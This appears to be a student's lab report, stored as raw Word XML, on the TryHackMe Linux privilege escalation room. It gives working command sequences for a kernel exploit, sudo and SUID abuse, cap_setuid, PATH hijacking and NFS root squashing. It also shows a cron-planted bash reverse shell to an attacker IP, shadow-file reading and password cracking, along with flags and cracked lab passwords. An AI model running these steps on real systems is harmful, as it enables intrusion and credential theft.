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b/>
          <w:bCs/>
          <w:color w:val="B01010"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t xml:space="preserve">Lab 7 – Post Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F5496"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux Privilege Escalation (Part-1)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="888888"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">TryHackMe – linprivesc Room</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="600"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1F5496"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">https://tryhackme.com/room/linprivesc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Uliya Fatima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232098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27,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TryHackMe – linprivesc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Machine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✓ All Tasks Completed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1. Lab Overview</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This lab covers Linux Privilege Escalation techniques using TryHackMe's linprivesc room. Starting as a low-privilege user, multiple attack vectors are explored to escalate to root across different target machines.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22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CVE / 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Kernel Exploit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LineKernel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CVE-2015-1328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THM-28392872729920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Misconfig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LinPrivEscSUDO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GTFOBins (nano/find)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THM-402028394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SUID Binaries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LinPrivEscSUID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SUID read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THM-3847834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LinPrivEscCAPA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cap_setuid (view)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THM-9349843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Writable cron script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THM-383000283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LinPrivEscPATH3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Fake binary injection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THM-736628929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LinPrivEscNFS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no_root_squash SUID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THM-89384012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Challenge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Privesc Challenge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+ sudo find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THM-42828719920544 / THM-168824782390238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2. TryHackMe Room Completion Proof</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">All tasks completed with 100% room progress. Screenshots below confirm correct answers submitted on TryHackMe.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2.1 Task 1 – Introduction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Task 1 Introduction – Correct Answer ✓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2.2 Task 2 – What is Privilege Escalation?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Task 2 – Privilege Escalation Theory – Correct Answer ✓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2.3 Task 3 – Enumeration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Task 3 Enumeration – All Correct Answers ✓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2.4 Task 4 – Automated Enumeration Tools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Task 4 Automated Enumeration Tools – Correct Answer ✓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2.5 Task 5 – Kernel Exploit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Task 5 Kernel Exploit – Flag1 Correct Answer ✓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2.6 – 2.12 Remaining Tasks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Remaining TryHackMe Tasks – Correct Answers ✓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TryHackMe Tasks Completion Proof ✓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TryHackMe 100% Room Completion ✓</w:t>
      </w:r>
    </w:p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3. Task 1 – Kernel Exploit (CVE-2015-1328)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3.1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LineKernel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10.49.180.27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wade7363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14.04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Kernel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3.13.0-24-generic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CVE-2015-1328 (overlayfs Local Privilege Escalation)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karen (uid=1001)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3.2 Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">After SSH login, basic system information was gathered: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ssh karen@10.49.180.27          # Password: Password1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hostname    →  wade7363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uname -a    →  Linux wade7363 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10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id          →  uid=1001(karen) gid=1001(karen) groups=1001(karen)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python --version  →  Python 2.7.6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SSH connected to target – enumeration commands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3.3 Exploit Discovery &amp; Transfer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Kernel 3.13.0-24 is vulnerable to CVE-2015-1328 (overlayfs). Exploit 37292.c was found via searchsploit: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searchsploit overlayfs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searchsploit -m 37292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python3 -m http.server 9999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searchsploit overlayfs – exploit 37292.c found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Python HTTP server serving exploit on port 9999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Kali TUN0 IP: 192.168.222.66 (VPN interface)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3.4 Exploit Execution – Root Shell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Target$ cd /tmp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Target$ wget http://192.168.222.66:9999/37292.c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Target$ gcc 37292.c -o exploit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Target$ chmod +x exploit &amp;&amp; ./exploit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whoami  →  root  ✓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cat /home/matt/flag1.txt  →  THM-28392872729920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wget exploit from Kali HTTP server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Exploit executed – ROOT shell obtained – Flag1 captured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3.5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hostname of the target system?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wade7363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Linux kernel version of the target system?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3.13.0-24-generic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Linux is this?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Ubuntu 14.04 LTS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version of Python is installed?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2.7.6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vulnerability affects the kernel? (CVE)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CVE-2015-1328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flag1.txt?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THM-28392872729920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hash of Frank's password?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$6$2.sUUDsOLIpXKxcr$eImtgFExyr2ls4jsghdD3DHLHHP9X50Iv...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4. Task 2 – Sudo Misconfigurations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4.1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LinPrivEscSUDO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10.48.182.195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karen (uid=1001)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LinPrivEscSUDO machine started – IP: 10.48.182.195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4.2 Sudo Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Running sudo -l revealed 3 binaries karen can run as root without password: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sudo -l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(ALL) NOPASSWD: /usr/bin/find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(ALL) NOPASSWD: /usr/bin/less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(ALL) NOPASSWD: /usr/bin/nano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sudo -l output – 3 NOPASSWD binaries (find, less, nano)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4.3 Exploitation – Reading /etc/shadow via nano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sudo nano /etc/shadow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sudo nano /etc/shadow – Frank and Karen hashes visible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Shadow file contents – user hashes extracted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4.4 Flag2 via sudo find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sudo find / -name 'flag2.txt' -exec cat {} \;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721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Flag2 captured: THM-402028394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4.5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hash of Frank's password?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$6$2.sUUDsOLIpXKxcr$eImtgFExyr2ls4jsghdD3DHLHHP9X50Iv.jNmwo/BJpphrPRJWjelWEz2HH...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How to spawn root shell if sudo rights on nmap?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sudo nmap --interactive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flag2.txt?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THM-402028394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How many programs can karen run with sudo rights?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5. Task 3 – SUID Binaries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5.1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LinPrivEscSUID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10.49.188.161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karen (uid=1001)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LinPrivEscSUID machine started – IP: 10.49.188.161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5.2 Finding SUID Binaries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find / -type f -perm -04000 -ls 2&gt;/dev/null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SUID binaries list – base64 highlighted as exploitable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5.3 Exploitation – base64 SUID</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">base64 has SUID bit set, allowing reading privileged files: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base64 /home/ubuntu/flag3.txt | base64 -d  →  THM-3847834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base64 /etc/shadow | base64 -d             # Extract user hashes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5.4 Password Cracking – user2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echo '$6$m6VmzKTbzCD/...' &gt; hash.txt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john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt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Result: Password1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John the Ripper cracking user2 hash – result: Password1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5.5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flag3.txt?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THM-3847834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password of user2?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Password1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Which user shares the name of a great comic book writer?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gerryconway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6. Task 4 – Capabilities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6.1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LinPrivEscCAPA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10.49.149.33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karen (uid=1001)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6.2 Finding Binaries with Capabilities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getcap -r / 2&gt;/dev/null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getcap output – 6 binaries with capabilities</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Binaries found with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/usr/lib/x86_64-linux-gnu/gstreamer1.0/gst-ptp-helper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cap_net_bind_service,cap_net_admin+ep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/usr/bin/traceroute6.iputils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cap_net_raw+ep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/usr/bin/mtr-packet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cap_net_raw+ep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/usr/bin/ping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cap_net_raw+ep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/home/karen/vim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cap_setuid+ep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/home/ubuntu/view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cap_setuid+ep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6.3 Exploitation – view binary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/home/ubuntu/view -c ':py3 import os; os.setuid(0); os.system("/bin/bash")'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whoami  →  root  ✓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cat /home/ubuntu/flag4.txt  →  THM-9349843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view exploit via cap_setuid – root shell – Flag4 captured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6.4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Complete the task on target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Done – root shell obtained via view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How many binaries have set capabilities?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6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other binary can be used through capabilities?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view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flag4.txt?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THM-9349843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7. Task 5 – Cron Jobs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7.1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LinPrivEscCRON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10.48.162.7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karen (uid=1001)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LinPrivEscCRON machine started – IP: 10.48.162.7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7.2 Crontab Enumeration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cat /etc/crontab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cat /etc/crontab – 4 user-defined cron jobs found</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4 User-defined cron jobs found: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 * * *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/antivirus.sh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 * * *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antivirus.sh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 * * *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/home/karen/backup.sh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 * * *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/tmp/test.py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7.3 Reverse Shell via backup.sh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">karen has write access to /home/karen/backup.sh which runs as root every minute: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echo '#!/bin/bash' &gt; /home/karen/backup.sh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echo 'bash -i &gt;&amp; /dev/tcp/192.168.222.66/4444 0&gt;&amp;1' &gt;&gt; /home/karen/backup.sh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chmod +x /home/karen/backup.sh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nc -lvnp 4444    # Wait 1 minute for cron to execute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Netcat listener – root reverse shell received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Flag5 captured: THM-383000283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7.4 Cracking Matt's Password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john matt_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt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Result: 123456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John cracking Matt's hash – password: 123456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7.5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How many user-defined cron jobs can you see?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4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flag5.txt?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THM-383000283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Matt's password?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123456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8. Task 6 – PATH Variable Exploitation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8.1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LinPrivEscPATH3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10.49.156.83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karen (uid=1001)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LinPrivEscPATH3 machine started – IP: 10.49.156.83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8.2 Finding Writable Directories &amp; SUID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find / -writable 2&gt;/dev/null | grep -v proc | grep -v sys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Odd writable folder found: /home/murdoch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find / -perm -4000 2&gt;/dev/null  →  /home/murdoch/test (SUID)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Writable folders list – /home/murdoch is odd/unusual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8.3 PATH Exploit Execution</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The SUID binary /home/murdoch/test calls 'thm' without full path. We create a malicious 'thm':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cd /home/murdoch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echo '/bin/bash' &gt; thm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chmod +x thm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export PATH=/home/murdoch:$PATH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./test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whoami  →  root  ✓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cat /home/matt/flag6.txt  →  THM-736628929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PATH exploit – root shell obtained – Flag6: THM-736628929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8.4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flag6.txt?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THM-736628929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odd folder you have write access for?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/home/murdoch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9. Task 7 – NFS (Network File System)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9.1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LinPrivEscNFS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10.49.136.166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karen (uid=1001)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LinPrivEscNFS machine started – IP: 10.49.136.166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9.2 NFS Enumeration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showmount -e 10.49.136.166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Target$ cat /etc/exports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3857625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showmount -e – 3 mountable NFS shares found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/etc/exports – all 3 shares have no_root_squash enabled</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">NFS Shares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/home/ubuntu/sharedfolder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rw, sync, insecure, no_root_squash, no_subtree_check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rw, sync, insecure, no_root_squash, no_subtree_check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/home/backup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rw, sync, insecure, no_root_squash, no_subtree_check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9.3 Exploitation – SUID Shell via NFS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Kali# sudo mkdir /tmp/nfstmp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Kali# sudo mount -t nfs 10.49.136.166:/tmp /tmp/nfstmp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Kali# sudo su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Kali# cat &gt; /tmp/nfstmp/shell.c   (C program with setuid(0))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Kali# gcc -static /tmp/nfstmp/shell.c -o /tmp/nfstmp/shell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Kali# chmod +s /tmp/nfstmp/shell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Target$ /tmp/shell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whoami  →  root  ✓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# cat /home/matt/flag7.txt  →  THM-89384012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Kali – NFS mount and SUID shell creation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Root shell via NFS SUID – Flag7: THM-89384012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9.4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flag7.txt?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THM-89384012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How many shares have the no_root_squash option enabled?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3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How many mountable shares on the target system?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10. Task 8 – Final Challenge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10.1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Privesc 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10.49.151.143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leonard (uid=1000)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Penny123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Linux Privesc Challenge machine – IP: 10.49.151.143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10.2 Enumeration as leonard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ssh leonard@10.49.151.143    # Password: Penny123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id  →  uid=1000(leonard)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sudo -l  →  User leonard may NOT run sudo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find / -perm -4000 2&gt;/dev/null  →  /usr/bin/base64 (SUID!)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SSH as leonard – sudo denied – base64 SUID found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10.3 Reading /etc/shadow via base64 SUID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base64 /etc/shadow | base64 -d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base64 /etc/shadow – missy and leonard hashes extracted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10.4 Cracking Missy's Password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echo '$6$BjOlWE21$...' &gt; missy_hash.txt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Kali$ john missy_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt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Result: Password1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John cracking Missy's hash – result: Password1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10.5 Flag1 – Switching to Missy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su missy    # Password: Password1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sudo -l  →  (ALL) NOPASSWD: /usr/bin/find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find / -name 'flag1.txt' 2&gt;/dev/null  →  /home/missy/Documents/flag1.txt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cat /home/missy/Documents/flag1.txt  →  THM-42828719920544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su missy – sudo find available – Flag1: THM-42828719920544</w:t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10.6 Flag2 – Root Access</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="111111" w:val="clear"/>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00EE44"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">$ base64 /home/rootflag/flag2.txt | base64 -d  →  THM-168824782390238</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="14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77"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">▲ Flag2 captured: THM-168824782390238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10.7 Task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flag1.txt?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THM-42828719920544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❓ What is the content of flag2.txt?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✅ THM-168824782390238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11. Complete Summary &amp; All Flags</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">All 9 tasks completed successfully with 100% room progress on TryHackMe.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100"/>
        <w:gridCol w:w="23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 / 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Kernel Exploit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LineKernel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CVE-2015-1328 (overlayfs)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THM-28392872729920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LinPrivEscSUDO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nano (NOPASSWD)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THM-402028394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LinPrivEscSUID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SUID read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THM-3847834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LinPrivEscCAPA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cap_setuid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THM-9349843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Jobs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LinPrivEscCRON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Writable cron script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THM-383000283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LinPrivEscPATH3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Fake binary via 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THM-736628929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LinPrivEscNFS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no_root_squash SUID shell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THM-89384012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Challenge Flag1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Privesc Challenge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SUID + su missy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THM-42828719920544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Challenge Flag2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Privesc Challenge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find / base64 read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THM-168824782390238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b/>
          <w:bCs/>
          <w:color w:val="1F5496"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Cracked Passwords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Hash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Cracked Password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SHA-512 crypt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John + rockyou.txt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SHA-512 crypt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123456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John + rockyou.txt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SHA-512 crypt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John + rockyou.txt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B01010"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">12. Key Takeaways</w:t>
      </w:r>
    </w:p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Outdated kernels (3.13.0-24) are locally exploitable via CVE-2015-1328 using the overlayfs vulnerability.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Sudo NOPASSWD misconfigurations on binaries like nano, find, less can be abused using GTFOBins to read sensitive files or spawn shells.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SUID binaries such as base64 allow reading privileged files like /etc/shadow without requiring root access directly.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Linux capabilities (cap_setuid) on binaries like vim/view allow privilege escalation by spawning root shells via Python.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Writable cron job scripts that execute as root are critical vulnerabilities enabling reverse shell escalation.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PATH variable injection via writable directories combined with SUID binaries leads to arbitrary command execution as root.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NFS shares configured with no_root_squash allow attackers to create SUID binaries from their machine that execute as root on target.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Always use John the Ripper with rockyou.txt wordlist for cracking Linux SHA-512 shadow hashes.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Enumeration is the most critical step – always run hostname, uname -a, id, sudo -l, find SUID, getcap, cat /etc/crontab.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2"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">— End of Report —</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Uliya Fatima  |  Student ID: 232098  |  April 27, 2026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496" w:sz="6" w:space="1"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:color w:val="555555"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">TryHackMe – linprivesc  |  Uliya Fatima  |  ID: 232098</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">	</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="1F5496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1010" w:sz="8" w:space="1"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="B01010"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:t xml:space="preserve">Lab 7 – Linux Privilege Escalation  |  Uliya Fatima</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:t xml:space="preserve">	</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="444444"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:t xml:space="preserve">Student ID: 232098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b5f8842083b5fbf6c229592243d7c55ea0115d.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/bf8fc802c3e07bfe22052505dabd183a211a91cd.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/7bf1818aad116b1740f42b3a2dbc24489bcb029f.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/f201b73c05b32a8ceae17abe1e7002db7898f397.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/335bae04fe30acdc7eb8d9b2ed11db5077ad2e61.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/8282058cdf3bb9b56cb1bf1e0759bb884b3f10d7.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/a35430667011fa8ad14bffefc06b8ebbe5cf3139.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/c40ea831d853b981d611bad0a648692da5f29772.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/7eba0ceafc6c82ad1936862e6b5a1c43216b5179.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/c8d697390ec011c59df118f9cd2b5c9aaf35b375.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/48283d77223adac620c8fde363e75848426991d3.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/c6507e2522fa7152bf7897345146350cf21ed5e3.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/b1776c1853b87db448259aa4825d6d8da467d339.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/8f861e40b449a74aa1c81ee6276616b43344e871.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/7f5838f92d4621af23ada39186768a3d69eb4628.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/cb335d2514ef3c9db5c545ab3432bfe3e298f33d.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/5a698cd14a11cf22bf693c8d89f735807767b1d1.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/b96a39be449f0270a346fbf5c0ad657a31ae034f.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/b64ee4beb96b097a7cf1675912a1f8e09c4116aa.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/a344f85221eb0238012bb27fcbc930aa783782b2.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/aaf4a25a7cf9eddd7831f55910d21818ca349eb2.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/9eddc76cb2565064bc26c9b86a69aced0c2b7e46.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/68bf54aec92036b800afeeeb63a18e70ed528192.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/52d10f84ed05c2f5c0a9a6fdbf374f99b4a599d6.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/6583053e1eeb57a63b607651517570786dfee3a7.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/b844dbdb1acea1abe78d90ca7dce695ed203f656.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/79e07e96cc277a7b34529cc0016988703cff21ff.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/730ba660bbd917148f6253c56af38a351ad4c85c.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/1698e4e73ef67c23a17e7e6451fe97158cbbb4c9.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/0ca9cb573b274ae2035eeb3726d73d23f0633cc1.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/6c40b0c6cfa78ea0b6a6840facf2f2019b0a6882.png"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/65da444666123c23584cadb860fa6fd10200e34a.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/5b211688f3e9e946fa0f5cdbbd99a7e33fa1ce84.png"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/5a8943c7889f4ba11fd21755c70558d08c20f5e1.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/e19b87c1c89fe5482ec1092eee0c5f087a0f3542.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/61dd17548a748293aecf86786efd746c062de4d0.png"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/e13fe6d86750013cc7a9bb6da41eba26aa47e0ac.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/d4929efe684176a625a9aeeca5e122233378b944.png"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/60fc315483502d1a5e28af272b6ce8a745985f25.png"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/fc468f9aaa723cbb3d0ce4e1f946079114d4dde3.png"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/9634fcf43a898c7eec11516d6b78ca6224d349a7.png"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/fbb147d2402667e7880c5460e463a8544452cb56.png"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/8badb3dda2a64d52b4a3f59e048dfead01fdd04e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2026-04-27T18:59:31.285Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-27T18:59:31.286Z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